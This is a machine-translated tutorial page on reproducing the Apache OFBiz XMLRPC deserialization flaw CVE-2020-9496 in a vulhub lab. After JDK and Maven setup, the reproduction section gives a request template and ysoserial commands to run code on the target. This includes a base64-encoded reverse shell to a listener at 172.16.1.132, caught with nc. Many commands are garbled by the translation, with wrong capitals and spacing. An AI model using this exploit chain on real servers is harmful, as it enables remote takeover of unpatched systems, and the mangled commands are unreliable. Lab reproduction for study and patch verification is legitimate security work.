Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

How to realize the recurrence of Apache Ofbiz XMLRPC RCE vulnerability CVE-2020-9496

2025-01-23 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Share

Shulou(Shulou.com)05/31 Report--

In this issue, the editor will bring you about how to achieve the reproduction of Apache Ofbiz XMLRPC RCE vulnerability CVE-2020-9496. The article is rich in content and analyzes and describes for you from a professional point of view. I hope you can get something after reading this article.

Introduction to 0x00

Apache OFBiz's full name is The ApacheOpen For Business Project. Is an open e-commerce platform, is a very famous open source project, provides a framework for building large and medium-sized enterprise-level, fast platform, cross-database, cross-application server multi-tier, distributed e-commerce WEB application system based on the latest J2EE/XML specifications and technical standards. OFBiz implements almost all the J2EE core design patterns, and the coupling between each module is relatively loose, and users can easily disassemble according to their own needs, which is very flexible.

Overview of 0x01 vulnerabilities

There is a deserialization vulnerability in Apache ofbiz, which allows attackers to construct specific xmlrpc http requests by accessing unauthorized interfaces, which can affect remote code execution.

0x02 affects version

-Apache Ofbiz:

< 17.12.04 0x03环境搭建 1、本次环境使用vulhub搭建,在装有docker环境的虚拟机中下载 git clone https://github.com/vulhub/vulhub.git

2. Enter the vulnerability directory, use docker-compose to pull the vulnerability environment, and the green done indicates success.

Cd vulhub/ofbiz/CVE-2020-9496 /

Docker-compose up-d

3. Visit https://your-ip:8443/myportal/control/main in the browser to access the registration page

4. The environment needed to reproduce the installation vulnerability

4.1 install the java8 environment

Https://www.oracle.com/java/technologies/javase/javase-jdk8-downloads.html chooses jdk to download according to its own system version

Create a folder and extract the downloaded java to the created file.

Mkdir / opt/java

Tar zxvf jdk-8u251-linux-x64.tar.gz-C / opt/java

4.3 add Java environment variables

Vim / etc/profile

Increase at the end

Export JAVA_HOME=/opt/java/ jdk1.8.0_141

Export CLASSPATH=.:$ {JAVA_HOME} / lib:$ {JRE_HOME} / lib

4.4 use environment variables to take effect immediately after adding. Check the java version after refreshing.

Source / etc/profile

Java-version

5. Install maven and download mvn using wget

Wget https://mirrors.bfsu.edu.cn/apache/maven/maven-3/3.6.3/binaries/apache-maven-3.6.3-bin.tar.gz

Mkdir / opt/maven

Tar zxvf apache-maven-3.6.3-bin.tar.gz-C / opt/maven/

5.1 configuration environment change

Vim / etc/profile

5.2 add at the bottom

Export MAVEN_HOME=/opt/maven/apache-maven-3.6.3

Export PATH=$MAVEN_HOME/bin:$PATH

5.3 use environment variables to take effect immediately after adding. Check the maven version after refreshing.

Source / etc/profile

Mvn-version

Recurrence of 0x04 vulnerabilities

1. Download the java deserialization tool ysoserial on GitHub

Git clone https://github.com/frohoff/ysoserial.git

2. Enter the ysoserial directory and use maven to download and compile the package, which is successfully compiled into the following images

Mvn clean package-DskipTests

3. You can see a target directory in the ysoserial directory. Enter this directory.

4. Visit the following link on the page url to grab the package using Burp and send it to the Repeater module

Https://your-ip:8443/webtools/control/xmlrpc

5. Replace the packet with the following packet

POST / webtools/control/xmlrpc HTTP/1.1

Host: your-ip

Content-Type: application/xml

Content-Length: 4093

ProjectDiscovery

Test

[base64-payload]

6. Use CommonsBeanutils1 using ysoserial to generate Payload to write files in the tmp directory

Java-jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "touch / tmp/success" | base64 | tr-d "\ n"

7. Copy the payload encoded by base64, paste it into the base64payload in the burp packet, and click send to check whether it has been written successfully in docker.

8. Take advantage of the loophole to rebound shell. Go to the following URL to encode the bounced shellpayload with base64.

Http://www.jackson-t.ca/runtime-exec-payloads.html

9. Encode the encoded shell once with the ysoserial tool.

Java-jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "bash-c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xMzIvMjI1OSAwPiYx} | {base64,-d} | {bash,-i}" | base64 | tr-d "\ n"

10. Set nc to listen, put the generated exp into the packet of burp and send it, and check nc snooping to return shell.

0x05 repair recommendation

1. Upgrade to the latest version is recommended.

The above is the editor for you to share how to achieve the recurrence of the Apache Ofbiz XMLRPC RCE vulnerability CVE-2020-9496, if you happen to have similar doubts, you might as well refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To

Network Security

Wechat

© 2024 shulou.com SLNews company. All rights reserved.

12
Report